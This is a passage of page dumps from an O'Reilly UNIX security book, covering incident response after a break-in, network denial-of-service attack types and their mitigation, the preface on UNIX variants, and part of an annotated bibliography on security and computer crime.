problem is being caused by a revenge-bent employee with a terminal in his office.<br />

Step 2: Contain or stop the damage.<br />

If you've identified the problem, take immediate steps to halt or limit it. For instance, if you've<br />

identified the employee who is deleting system files, you'll want to turn off his account, and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_01.htm (2 of 3) [2002-04-12 10:45:14]


[Chapter 24] Discovering a Break-in<br />

probably take disciplinary action as well. Both are steps to limit the damage to your data and<br />

system.<br />

Step 3: Confirm your diagnosis and determine the damage.<br />

After you've taken steps to contain the damage, confirm your diagnosis of the problem and<br />

determine the damage it caused. Are files still disappearing after the employee is discharged? You<br />

may never be 100% sure if two or more incidents are actually related. Furthermore, you may not<br />

be able to identify all of the damage immediately, if ever.<br />

Step 4: Restore your system.<br />

After you know the extent of the damage, you need to restore the system and data to a consistent<br />

state. This may involve reloading portions of the system from backups, or it may mean a simple<br />

restart of the system. Before you proceed, be certain that all of the programs you are going to use<br />

are "safe." The attacker may have replaced your restore program with a Trojan horse that deletes<br />

both the files on your hard disk and on your backup tape!<br />

Step 5: Deal with the cause.<br />

If the problem occurred because of some weakness in your security or operational measures, you'll<br />

want to make changes and repairs after your system has been restored to a normal state. If the<br />

cause was a person making a mistake, you will probably want to educate him or her to avoid a<br />

second occurrence of the situation. If someone purposefully interfered with your operations, you<br />

may wish to involve law enforcement authorities.<br />

Step 6: Perform related recovery.<br />

If what occurred was covered by insurance, you may need to file claims. Rumor control, and<br />

perhaps even community relations, will be required at the end of the incident to explain what<br />

happened, what breaches occurred, and what measures were taken to resolve the situation. This<br />

step is especially important with a large user community, because unchecked rumors and fears can<br />

often damage your operations more than the problem itself.<br />

VI. Handling <strong>Sec</strong>urity<br />

Incidents<br />

24.2 Discovering an Intruder<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_01.htm (3 of 3) [2002-04-12 10:45:14]


[Chapter 24] 24.7 Damage Control<br />

24.7 Damage Control<br />

Chapter 24<br />

Discovering a Break-in<br />

If you've already restored the system, what damage is there to control? Well, the aftermath, primarily.<br />

You need to follow through on any untoward consequences of the break-in. For instance, was proprietary<br />

information copied? If so, you need to notify your legal counsel and consider what to do.<br />

You should determine which of the following concerns need to be addressed:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Do you need to file a formal report with law enforcement?<br />

Do you need to file a formal report with a regulatory agency?<br />

Do you need to file an insurance claim for downtime, use of hot spares, etc?<br />

Do you need to institute disciplinary or dismissal actions against one or more employees?<br />

Do you need to file a report/request with your vendor?<br />

Do you need to update your disaster recovery plan to account for changes or experiences in this<br />

instance?<br />

Do you need to investigate and fix the software or configuration of any other systems under your<br />

control, or at any affiliated sites? That is, has this incident exposed a vulnerability elsewhere in<br />

your organization?<br />

Do you need to update employee training to forestall any future incidents of this type?<br />

Do you need to have your public relations office issue a formal report (inside or outside) about this<br />

incident?<br />

The answers to the above questions will vary from situation to situation and incident to incident. We'll<br />

cover a few of them in more detail in succeeding chapters.<br />

24.6 Resuming Operation 25. Denial of Service Attacks<br />

and Solutions<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_07.htm [2002-04-12 10:45:14]


[Chapter 24] 24.6 Resuming Operation<br />

Chapter 24<br />

Discovering a Break-in<br />

24.6 Resuming Operation<br />

The next step in handling a break-in is to restore the system to a working state. How quickly you must be<br />

back in operation, and what you intend to do about the break-in in the long term, will determine when<br />

and how you do this step.<br />

In general you have a few options about how to proceed from this point:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Investigate until you have determined how the break-in happened, and when. Close up the holes<br />

and restore the system to the state it was prior to the break-in.<br />

Simply patch and repair whatever you think may have been related to the break-in. Then restore<br />

the system to operation with heightened monitoring.<br />

Do a quick scan and cleanup, and put the system back into operation.<br />

Call in law enforcement before you do anything else so they can start an investigation.<br />

Do nothing whatsoever.<br />

You want to get whatever assurance you can that you have restored anything damaged on the system, and<br />

fixed whatever it was that allowed the intruder in. Then, if you have been keeping good backups, you can<br />

restore the system to a working state.<br />

The difficulty with determining what failed and allowed an intruder in is complicated by the fact that<br />

there is usually little data in the logs to show what happened, and there are few things you can execute to<br />

reverse-engineer the break-in. Most break-ins seem to result from either a compromised user password<br />

(suspect this especially if you find that the intruders have installed a sniffer on your system), or a bug. If<br />

it is a bug, you may have difficulty determining what it is, especially if it is a new one that has not been<br />

widely exploited. If you suspect that it is a bug in some system software, you can try contacting your<br />

vendor to see if you can get some assistance there. In some cases it helps if you have a maintenance<br />

contract or are a major customer.<br />

Another avenue you can explore is to contact the FIRST team appropriate for your site. Teams in FIRST<br />

often have some insight into current break-ins, largely because they see so many reports of them.<br />

Contacting a representative from one of the teams may result in some good advice for things to check<br />

before you put your system back into operation. However, many teams have rules of operation that<br />

prevent them from giving too much explicit information about active vulnerabilities until the appropriate<br />

vendors have announced a fix. Thus, you may not be able to get complete information from this source.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_06.htm (1 of 2) [2002-04-12 10:45:15]


[Chapter 24] 24.6 Resuming Operation<br />

As a possible last resort, you might consult recent postings to the Usenet security groups, and to some of<br />

the current WWW sites and mailing lists. Often, current vulnerabilities are discussed in some detail in<br />

these locations. This is a mixed blessing, because not only does this provide you with some valuable<br />

information to protect (or restore) your site, but it also often provides details to hacker wannabes who are<br />

looking for ways to break into systems. It is also the case that we have seen incorrect and even dangerous<br />

advice and analysis given in some of these forums. Therefore, be very wary of what you read, and<br />

consider these sources as a last resort.<br />

24.5 An Example 24.7 Damage Control<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_06.htm (2 of 2) [2002-04-12 10:45:15]


[Chapter 25] 25.3 Network Denial of Service Attacks<br />

Chapter 25<br />

Denial of Service Attacks and<br />

Solutions<br />

25.3 Network Denial of Service Attacks<br />

Networks are also vulnerable to denial of service attacks. In attacks of this kind, someone prevents<br />

legitimate users from using the network. The three common types of network denial of service attacks<br />

are service overloading, message flooding, and signal grounding. A fourth kind of attack is less common,<br />

but possible, and we describe it as clogging.<br />

25.3.1 Service Overloading<br />

Service overloading occurs when floods of network requests are made to a server daemon on a single<br />

computer. These requests can be initiated in a number of ways, many intentional. The result of these<br />

floods can cause your system to be so busy servicing interrupt requests and network packets that it is<br />

unable to process regular tasks in a timely fashion. Many requests will be thrown away as there is no<br />

room to queue them. If it is a TCP-based service, they will be resent and will add to the load. Such<br />

attacks can also mask an attack on another machine by preventing audit records and remote login<br />

requests from being processed in a timely manner. They deny access to a particular service.<br />

You can use a network monitor to reveal the type, and sometimes the origin, of overload attacks. If you<br />

have a list of machines and the low-level network address (i.e., Ethernet board-level address, not IP<br />

address) this may help you track the source of the problem if it is local to your network. Isolating your<br />

local subnet or network while finding the problem may also help. If you have logging on your firewall or<br />

router, you can quickly determine if the attack is coming from outside your network or inside[10] - you<br />

cannot depend on the IP address in the packet being correct.<br />

[10] We are unaware of any firewall offering reliable protection against denial of service<br />

attacks of this kind.<br />

Unfortunately, there is little that you, as an end user or administrator, can do to help make the protocols<br />

and daemons more robust in the face of such attacks. The best you can hope to do, at present, is to limit<br />

their effect. Partitioning your local network into subnets of only a few dozen machines each is one good<br />

approach. That way, if one subnet gets flooded as part of an attack or accident, not all of your machines<br />

are disabled.<br />

Another action you can take is to prepare ahead of time for an attack. If you have the budget, buy a<br />

network monitor and have (protected) spare taps on your subnet so you can quickly hook up and monitor<br />

network traffic. Have printed lists of machine low-level and high-level addresses available so you can<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_03.htm (1 of 4) [2002-04-12 10:45:16]


[Chapter 25] 25.3 Network Denial of Service Attacks<br />

determine the source of the overload by observing packet flow.<br />

One partial help is if the service being attacked is spawned from the inetd with the nowait option. inetd,<br />

by default, has a "throttle" built in. If too many requests are received in too short a time for any of the<br />

services it monitors, it will start rejecting requests and syslog a message that the service is failing. This is<br />

done under the assumption that some bug has been triggered to cause all the traffic. This has the<br />

side-effect of disabling your service as surely as if all the requests were accepted for processing.<br />

However, it may prevent the server itself from failing, and it results in an audit record showing when the<br />

problem occurred.<br />

25.3.2 Message Flooding<br />

Message flooding occurs when a user slows down the processing of a system on the network to prevent<br />

the system from processing its normal workload, by "flooding" the machine with network messages<br />

addressed to it. These may be requests for file service or login, or they may be simple echo-back<br />

requests. Whatever the form, the flood of messages overwhelms the target so it spends most of its<br />

resources responding to the messages. In extreme cases, this flood may cause the machine to crash with<br />

errors or lack of memory to buffer the incoming packets. This attack denies access to a network server.<br />

A server that is being flooded may not be able to respond to network requests in a timely manner. An<br />

attacker can take advantage of this behavior by writing a program that answers network requests in the<br />

server's place. For example, an attacker could flood an NIS server and then issue his own replies for NIS<br />

requests - specifically, requests for passwords.<br />

Suppose an attacker writes a program that literally bombards an NIS server machine with thousands of<br />

echo requests every second directed to the echo service. The attacker simultaneously attempts to log into<br />

a privileged account on a workstation. The workstation would request the NIS passwd information from<br />

the real server, which would be unable to respond quickly because of the flood. The attacker's machine<br />

could then respond, masquerading as the server, and supply bogus information, such as a record with no<br />

password. Under normal circumstances, the real server would notice this false packet and repudiate it.<br />

However, if the server machine is so loaded that it never receives the packet, or fails to receive it in a<br />

timely fashion, it cannot respond. The client workstation would believe the false response to be correct<br />

and process the attacker's login attempt with the false passwd entry.[11]<br />

[11] Yes, we are leaving out some low-level details here. This form of masquerade is not as<br />

simple as we describe it, but it is possible.<br />

A similar type of attack is a broadcast storm. By careful crafting of network messages, you can create a<br />

special message that instructs every computer receiving the message to reply or retransmit it. The result<br />

is that the network becomes saturated and unusable. Broadcast storms rarely result from intentional<br />

attack; more often, they result from failing hardware or from software that is under development, buggy,<br />

or improperly installed.<br />

Broadcasting incorrectly formatted messages can also bring a network of machines to a grinding halt. If<br />

each machine is configured to log the reception of bad messages to disk or console, they could broadcast<br />

so many messages that the clients can do nothing but process the errors and log them to disk or console.<br />

Again, preparing ahead with a monitor and breaking your network into subnets will help you prevent and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_03.htm (2 of 4) [2002-04-12 10:45:16]


[Chapter 25] 25.3 Network Denial of Service Attacks<br />

deal with this kind of problem, although such planning will not eliminate the problem completely.<br />

25.3.3 Signal Grounding<br />

Physical methods can also be used to disable a network. Grounding the signal on a network cable,<br />

introducing some other signal, or removing an Ethernet terminator all have the effect of preventing<br />

clients from transmitting or receiving messages until the problem is fixed. This type of attack can be used<br />

not only to disable access to various machines that depend on servers to supply programs and disk<br />

resources, but also to mask break-in attempts on machines that report bad logins or other suspicious<br />

behavior to master machines across the network. For this reason, you should be suspicious of any<br />

network outage; it might be masking break-ins on individual machines.<br />

Another method of protection, which also helps to reduce the threat of eavesdropping, is to protect the<br />

network cable physically from tapping. This protection reduces the threat of eavesdroppers and spoofers<br />

to well-defined points on the cable. It also helps reduce the risk of denial of service attacks from signal<br />

grounding. Chapter 12, Physical <strong>Sec</strong>urity, discusses the physical protection of networks.<br />

25.3.4 Clogging<br />

The implementation of the TCP/IP protocols on many versions of <strong>UNIX</strong> allow them to be abused in<br />

various ways. To deny service, one way is to use up the limit of partially open connections. TCP<br />

connections open on a multi-way handshake to open a connection and set parameters. If an attacker sends<br />

multiple requests to initiate a connection but then fails to follow through with the subsequent parts of the<br />

connection, the recipient will be left with multiple half-open connections that are occupying limited<br />

resources. Usually, these connection requests have forged source addresses that specify nonexistent or<br />

unreachable hosts that cannot be contacted. Thus, there is also no way to trace the connections back.<br />

They remain until they time out (or until they are reset by the intruder).<br />

By analogy, consider what happens when your phone rings. You answer and say "hello" but no one<br />

responds. You wait a few seconds, then say "hello" again. You may do this one or two more times until<br />

you "time out" and hang up. However, during the time you are waiting for someone to answer your<br />

"hello" (and there may be no one there), the phone line is tied up and can process no other incoming<br />

calls.<br />

There is little you can do in these situations. Modifications to the operating system sources could result in<br />

a tunable time-out, better logging of these problems, and a higher limit on the number of half-open<br />

connections allowed before new requests are rejected. However, these modifications are not simple to<br />

make.<br />

Firewalls generally do not address this problem either. The best you can achieve is to reject connection<br />

attempts from unknown hosts and networks at the firewall. The only other alternative is to rethink the<br />

protocols involved, and perhaps set much higher limits on the existing implementations. However, any<br />

finite limit can be exceeded. Networks based on virtual circuits (e.g., ATM) may provide a solution by<br />

bypassing the protocol problems completely. However, ATM and related technologies probably have<br />

their own set of vulnerabilities that we have yet to discover.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_03.htm (3 of 4) [2002-04-12 10:45:16]


[Chapter 25] 25.3 Network Denial of Service Attacks<br />

25.2 Overload Attacks 26. Computer <strong>Sec</strong>urity and<br />

U.S. Law<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_03.htm (4 of 4) [2002-04-12 10:45:16]


[Preface] Which <strong>UNIX</strong> System?<br />

Which <strong>UNIX</strong> System?<br />

Preface<br />

An unfortunate side effect of <strong>UNIX</strong>'s popularity is that there are many different versions of <strong>UNIX</strong>; today,<br />

nearly every computer manufacturer has its own. Until recently, only <strong>UNIX</strong> operating systems sold by<br />

AT&T could be called "<strong>UNIX</strong>" because of licensing restrictions. Others manufacturers adopted names<br />

such as SunOS (Sun Microsystems), Solaris (also Sun Microsystems), Xenix (Microsoft), HP-UX<br />

(Hewlett-Packard), A/UX (Apple), Dynix (Sequent), OSF/1 (Open Software foundation), Linux (Linus<br />

Torvalds), Ultrix (Digital Equipment Corporation), and AIX (IBM)-to name a few. <strong>Practical</strong>ly every<br />

supplier of a <strong>UNIX</strong> or <strong>UNIX</strong>-like operating system made its own changes to the operating system. Some<br />

of these changes were small, while others were significant. Some of these changes have dramatic security<br />

implications, and unfortunately, many of these implications are usually not evident. Not every vendor<br />

considers the security implications of their changes before making them.<br />

When we wrote the first edition of this book, there were two main families of <strong>UNIX</strong>: AT&T System V,<br />

and Berkeley's BSD. There were also some minor variations, including AT&T System III, Xenix, System<br />

8, and a few others. For many years, there was a sharp division between System V and BSD systems.<br />

System V was largely favored by industry and government because of its status as a well-supported,<br />

"official" version of <strong>UNIX</strong>. BSD, meanwhile, was largely favored by academic sites and developers<br />

because of its flexibility, scope, and additional features.<br />

As we describe in Chapter 1, the two main families of <strong>UNIX</strong> reunited several years ago in the form of<br />

System V Release 4 (usually referred to as V.4 or SVR4). Many of the better features of BSD 4.3 <strong>UNIX</strong><br />

were built into SVR4, resulting in a system that combines many of the best features of both systems (as<br />

well as a few of the worst, unfortunately). This now represents the dominant basis for most modern<br />

versions of <strong>UNIX</strong>, with the notable exception of the "free" versions of <strong>UNIX</strong>: BSD 4.4, FreeBSD, and<br />

Linux.<br />

This book covers <strong>UNIX</strong> security as it relates to common versions of <strong>UNIX</strong>. Specifically, we have<br />

attempted to present the material here as it pertains to SVR4 and then note differences with respect to<br />

other versions. Because of our long-standing experience with (and fondness for) the BSD-derived<br />

versions of <strong>UNIX</strong>, we will often refer to feature differences in terms of "BSD-derived features" and<br />

"AT&T-derived features," even though SVR4 may be thought of as having both. When you encounter<br />

these terms, think of "BSD-derived" as meaning BSD systems, Ultrix, SunOS 3.X and 4.X, Solaris 2.x,<br />

and SVR4. When you encounter the term "AT&T-derived," think of System V Release 3, Solaris 2.x,<br />

and, to some extent, AIX and HP-UX.<br />

Particular details in this book concerning specific <strong>UNIX</strong> commands, options, and side effects are based<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_03.htm (1 of 4) [2002-04-12 10:45:16]


[Preface] Which <strong>UNIX</strong> System?<br />

upon the authors' experience with AT&T System V Release 3.2 and 4.0, Berkeley <strong>UNIX</strong> Release 4.3 and<br />

4.4, NEXTSTEP, Digital <strong>UNIX</strong> (the new name for OSF/1), SunOS 4.0 and 4.1, Solaris 2.3 and 2.4, and<br />

Ultrix 4.0. We've also had the benefit of our technical reviewers' long experience with other systems,<br />

such as AIX, HP-UX, and Linux. As these systems are representative of the majority of <strong>UNIX</strong> machines<br />

in use, it is likely that these descriptions will suffice for most machines to which the reader will have<br />

access.<br />

NOTE: Throughout this book, we generally refer to System V Release 4 as SVR4. When<br />

we refer to SunOS without a version number, assume that we are referring to SunOS 4.1.x.<br />

When we refer to Solaris without a version number, assume that we are referring to Solaris<br />

2.x.<br />

Many <strong>UNIX</strong> vendors have modified the basic behavior of some of their system commands, and there are<br />

dozens upon dozens of <strong>UNIX</strong> vendors. As a result, we don't attempt to describe every specific feature<br />

offered in every version issued by every manufacturer-that would only make the book longer, as well as<br />

more difficult to read. It would also make this book inaccurate, as some vendors change their systems<br />

frequently. Furthermore, we are reluctant to describe special-case features on systems we have not been<br />

able to test thoroughly ourselves. Whether you're a system administrator or an ordinary user, it's vital that<br />

you read the reference pages of your own particular <strong>UNIX</strong> system to understand the differences between<br />

what is presented in this volume and the actual syntax of the commands that you're using. This is<br />

especially true in situations in which you're depending upon the specific output or behavior of a program<br />

to verify or enhance the security of your system.<br />

The Many Faces of "Free Unix"<br />

One of the difficulties in writing a book such as this is that there are many, many versions of <strong>UNIX</strong>. All<br />

of them have differences: some minor, some significant. Our problem, as you shall see, is that even<br />

apparently minor difference between two operating systems can lead to dramatic differences in overall<br />

security. Simply changing the protection settings on a single file can turn a secure operating system into<br />

an unsecure one.<br />

The Linux operating system makes things even more complicated. That's because Linux is an anarchic,<br />

moving target. There are many different versions of Linux. Some have minor differences, such as the<br />

installation of a patch or two. Others are drastically different, with different kernels, different driver<br />

software, and radically different security models.<br />

Linux is not the only free form of <strong>UNIX</strong>. After the release of Berkeley 4.3, the Berkeley Computer<br />

Systems Research Group (CSRG) (and a team of volunteers across the <strong>Internet</strong>) worked to develop a<br />

final release, BSD 4.4, which was devoid of all AT&T code. Somewhere along the line the project split<br />

into several factions, eventually producing three operating systems: BSD 4.4, NetBSD, and FreeBSD.<br />

Today there are several versions of each of these operating systems. There are also systems based on<br />

Mach and employing <strong>UNIX</strong>-like utilities from a number of sources.<br />

Today, the world of free <strong>UNIX</strong> is a maelstrom. It's as if commercial <strong>UNIX</strong> was being promoted and<br />

developed by several thousand different vendors. Thus, if you want to run Linux, or NetBSD, or<br />

FreeBSD, or any other such system securely, it is vitally important that you know exactly what software<br />

you are running on your computer. Merely reading your manual may not be enough! You may have to<br />

read the source code. You may have to verify that the source code that you are reading actually compiles<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_03.htm (2 of 4) [2002-04-12 10:45:16]


[Preface] Which <strong>UNIX</strong> System?<br />

to produce the binaries that you are running!<br />

Also, please note that we cannot possibly describe (or even know) all the possible variations and<br />

implications, so don't assume that we have covered all the nuances of your particular system. When in<br />

doubt, check it out.<br />

NOTE: By writing this book, we hope to provide information that will help users and<br />

system administrators improve the security of their systems. We have tried to ensure the<br />

accuracy and completeness of everything within this book. However, as we noted<br />

previously, we can't be sure that we have covered everything, and we can't know about all<br />

the quirks and modifications made to every version and installation of <strong>UNIX</strong>-derived<br />

systems. There are so many versions, furthermore, that sometimes it is easy to get similar<br />

but different versions confused. Thus, we can't promise that your system security will never<br />

be compromised if you follow all our advice, but we can feel sure in promising that attacks<br />

will be less likely. We encourage readers to tell us of significant differences between their<br />

own experiences and the examples presented in this book; those differences may be noted in<br />

future editions.<br />

"<strong>Sec</strong>ure" Versions of <strong>UNIX</strong><br />

Over time, several vendors have developed "secure" versions of <strong>UNIX</strong>, often known as "trusted <strong>UNIX</strong>."<br />

These systems embody mechanisms, enhancements, and restraints described in various government<br />

standards documents. These enhanced versions of <strong>UNIX</strong> are designed to work in Multi-Level <strong>Sec</strong>urity<br />

(MLS) and Compartmented-Mode Workstation (CMW) environments-where there are severe constraints<br />

designed to prevent the mixing of data and code with different security classifications, such as <strong>Sec</strong>ret and<br />

Top-<strong>Sec</strong>ret. Trusted Xenix and System V/MLS are two of the better-known instances of trusted <strong>UNIX</strong>.<br />

<strong>Sec</strong>ure <strong>UNIX</strong> systems generally have extra features added to them including access control lists, data<br />

labeling, and enhanced auditing. They also remove some traditional features of <strong>UNIX</strong> such as the<br />

superuser's special access privileges, and access to some device files. Despite these changes, the systems<br />

still bear a resemblance to standard <strong>UNIX</strong>.<br />

These systems are not in widespread use outside of selected government agencies. It seems doubtful to us<br />

that they will ever enjoy widely popular acceptance because many of the features only make sense within<br />

the context of a military security policy. On the other hand, some of these enhancements are useful in the<br />

commercial environment as well, and C2 security features are already common in many modern versions<br />

of <strong>UNIX</strong>.<br />

Today trusted <strong>UNIX</strong> systems are often more difficult to use in a wide variety of environments, more<br />

difficult to port programs to, and more expensive to obtain and maintain. Thus, we haven't bothered to<br />

describe the quirks and special features of these systems in this book. If you have such a system, we<br />

recommend that you read the vendor documentation carefully and repeatedly. If these systems become<br />

more commonly accepted, we'll describe them in a future edition.<br />

Scope of This Book Conventions Used in This<br />

Book<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_03.htm (3 of 4) [2002-04-12 10:45:16]


[Preface] Which <strong>UNIX</strong> System?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_03.htm (4 of 4) [2002-04-12 10:45:16]


[Appendix D] Paper Sources<br />

D. Paper Sources<br />

Contents:<br />

<strong>UNIX</strong> <strong>Sec</strong>urity References<br />

<strong>Sec</strong>urity Periodicals<br />

Appendix D<br />

There have been a great many books, magazines and papers published on security in the last few years,<br />

reflecting the growing concern with the topic. Trying to keep up with even a subset of this information<br />

can be quite a chore, whether you wish to stay current as a researcher or as a practitioner. Here, we have<br />

collected information about a number of useful references that you can use as a starting point for more<br />

information, further depth, and additional assistance. We have tried to confine the list to accessible and<br />

especially valuable references that you will not have difficulty finding.[1] We've provided annotation<br />

where we think it will be helpful.<br />

[1] If you have some other generally accessible reference that you think is outstanding and<br />

that we omitted from this list, please let us know.<br />

In Appendix E we also list some online resources in which you can find other publications and<br />

discussions on security. In Appendix F, we give pointers to a number of professional organizations<br />

(including ACM, Usenix, and the IEEE Computer Society) that sponsor periodic conferences on security;<br />

you may wish to locate the proceedings of those conferences as an additional reference. We especially<br />

recommend the proceedings of the annual Usenix <strong>Sec</strong>urity Workshop: these are generally <strong>UNIX</strong>-related<br />

and more oriented toward practice than theory.<br />

D.1 <strong>UNIX</strong> <strong>Sec</strong>urity References<br />

These books focus on <strong>UNIX</strong> computer security.<br />

Curry, David A. <strong>UNIX</strong> System <strong>Sec</strong>urity: A Guide for Users and System Administrators. Reading, MA:<br />

Addison Wesley, 1992. Lots of sound advice from someone with real experience to back it up.<br />

Farrow, Rik. <strong>UNIX</strong> System <strong>Sec</strong>urity. Reading, MA: Addison Wesley, 1991. A reasonable overview of<br />

<strong>UNIX</strong> security, with emphasis on the DoD Orange Book and <strong>UNIX</strong> System V.<br />

Ferbrache, David, and Gavin Shearer. Unix Installation, <strong>Sec</strong>urity & Integrity. Englewood Cliffs, NJ:<br />

Prentice Hall, 1993. This is a comprehensive treatment of computer security issues in <strong>UNIX</strong>, although<br />

some areas are not treated in the same depth as others.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (1 of 11) [2002-04-12 10:45:17]


[Appendix D] Paper Sources<br />

Grampp, F. T., and R. H. Morris. "<strong>UNIX</strong> Operating System <strong>Sec</strong>urity," AT&T Bell Laboratories<br />

Technical Journal, October 1984. This is the original article on <strong>UNIX</strong> security and remains timely.<br />

Reid, Brian. "Reflections on Some Recent Widespread Computer Break-ins." Communications of the<br />

ACM, Volume 30, Number 2, February 1987. Some interesting comments on <strong>UNIX</strong> security based on<br />

some break-ins at various sites. Still timely.<br />

Wood, Patrick H., and Stephen G. Kochan. <strong>UNIX</strong> System <strong>Sec</strong>urity, Carmel, IN: Hayden Books, 1986. A<br />

good but very dated treatment of <strong>UNIX</strong> System V security prior to the incorporation of TCP/IP<br />

networking. This book is of mainly historical interest.<br />

D.1.1 Other Computer References<br />

The following books and articles are of general interest to all practitioners of computer security, with<br />

<strong>UNIX</strong> or another operating system.<br />

D.1.2 Computer Crime and Law<br />

Arkin, S. S., B. A. Bohrer, D. L. Cuneo, J. P. Donohue, J. M. Kaplan, R. Kasanof, A. J. Levander, and S.<br />

Sherizen. Prevention and Prosecution of Computer and High Technology Crime. New York, NY:<br />

Matthew Bender Books, 1989. A book written by and for prosecuting attorneys and criminologists.<br />

BloomBecker, J. J. Buck. Introduction to Computer Crime. Santa Cruz CA: National Center for<br />

Computer Crime Data, 1988. (Order from NCCCD, 408-475-4457.) A collection of essays, news articles,<br />

and statistical data on computer crime in the 1980s.<br />

BloomBecker, J. J. Buck. Spectacular Computer Crimes. Homewood, IL: Dow Jones-Irwin, 1990. Lively<br />

accounts of some of the more famous computer-related crimes of the past two decades.<br />

BloomBecker, J.J. (as Becker, Jay). The Investigation of Computer Crime. Columbus, OH: Battelle Law<br />

and Justice Center, 1992.<br />

Communications of the ACM, Volume 34, Number 3, March 1991: the entire issue. This issue has a<br />

major feature discussing issues of computer publishing, Constitutional freedoms, and enforcement of the<br />

laws. This document is a good source for an introduction to the issues involved.<br />

Conly, Catherine H. Organizing for Computer Crime Investigation and Prosecution, Washington, DC:<br />

National Institutes of Justice, 1989. A publication intended for law-enforcement personnel.<br />

Cook, William J. <strong>Internet</strong> & Network Law 1995. A comprehensive volume which is updated regularly;<br />

the title may change to reflect the year of publication. For further information, contact the author at:<br />

Willian Brinks Olds Hofer Gilson and Lione<br />

Suite 3600,<br />

NBC Tower<br />

455 N Cityfront Plaza Dr.<br />

Chicago, IL 60611-4299<br />

Icove, David, Karl Seger, and William VonStorch, Computer Crime: A Crimefighter's Handbook,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (2 of 11) [2002-04-12 10:45:17]


[Appendix D] Paper Sources<br />

Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1995. A popular rewrite of an FBI training manual.<br />

McEwen, J. Thomas. Dedicated Computer Crime Units. Washington, DC: National Institutes of Justice,<br />

1989. Another publication intended for law-enforcement personnel.<br />

Parker, Donn B. Computer Crime: Criminal Justice Resource Manual. Washington, DC:National<br />

Institutes of Justice, 1989. A comprehensive document for investigation and prosecution of<br />

computer-related crimes. (Order from +1-800-851-3420.)<br />

Power, Richard. Current and Future Danger: A CSI Primer on Computer Crime and Information<br />

Warfare. San Francisco, CA: Computer <strong>Sec</strong>urity Institute, 1995. An interesting and timely summary.<br />

Sieber, Ulrich, ed. International Review of Penal Law: Computer Crime and Other Crimes against<br />

Information Technology. Toulouse, France: 1992.<br />

D.1.3 Computer-Related Risks<br />

Leveson, Nancy G. Safeware: System Safety and Computers. A Guide to Preventing Accidents and<br />

Losses Caused by Technology. Reading, MA: Addison Wesley, 1995. This textbook contains a<br />

comprehensive exploration of the dangers of computer systems, and explores ways in which software can<br />

be made more fault tolerant and safety conscious.<br />

Neumann, Peter G. Computer Related Risks. Reading, MA: Addison & Wesley, 1995. Dr. Neumann<br />

moderates the <strong>Internet</strong> RISKS mailing list. This book is a collection of the most important stories passed<br />

over the mailing list since its creation.<br />

Weiner, Lauren Ruth. Digital Woes: Why we Should not Depend on Software. Reading, MA:<br />

Addison-Wesley, 1993. A popular account of problems with software.<br />

D.1.4 Computer Viruses and Programmed Threats<br />

Communications of the ACM, Volume 32, Number 6, June 1989 (the entire issue). This whole issue was<br />

devoted to issues surrounding the <strong>Internet</strong> Worm incident.<br />

Computer Virus Attacks. Gaithersburg, MD: National Computer Systems Bulletin, National Computer<br />

Systems Laboratory, National Institute for Standards and Technology. (Order from National Technical<br />

Information Service, 703-487-4650, Order number PB90-115601.) One of many fine summary<br />

publications published by NIST; contact NTIS at 5285 Port Royal Road, Springfield, VA 22161, for a<br />

complete publication list.<br />

Denning, Peter J. Computers Under Attack: Intruders, Worms and Viruses. Reading, MA:<br />

ACM Press/Addison-Wesley, 1990. One of the two most comprehensive collections of readings related<br />

to these topics, including reprints of many classic articles. A "must-have."<br />

Ferbrache, David. The Pathology of Computer Viruses. London, England: Springer-Verlag, 1992. This is<br />

probably the best all-around book on the technical aspects of computer viruses.<br />

Hoffman, Lance J., Rogue Programs: Viruses, Worms and Trojan Horses. New York, NY: Van Nostrand<br />

Reinhold, 1990. The other most comprehensive collection of readings on viruses, worms, and the like. A<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (3 of 11) [2002-04-12 10:45:17]


[Appendix D] Paper Sources<br />

must for anyone interested in the issues involved.<br />

The Virus Bulletin. Virus Bulletin CTD. Oxon, England. A monthly international publication on<br />

computer virus prevention and removal. (U.S. orders may be placed c/o June Jordan, (203) 431-8720 for<br />

$395/year. European orders may be placed through +44 235-555139 for (£195/year.) This is an<br />

outstanding publication about computer viruses and virus prevention. It is likely to be of value only to<br />

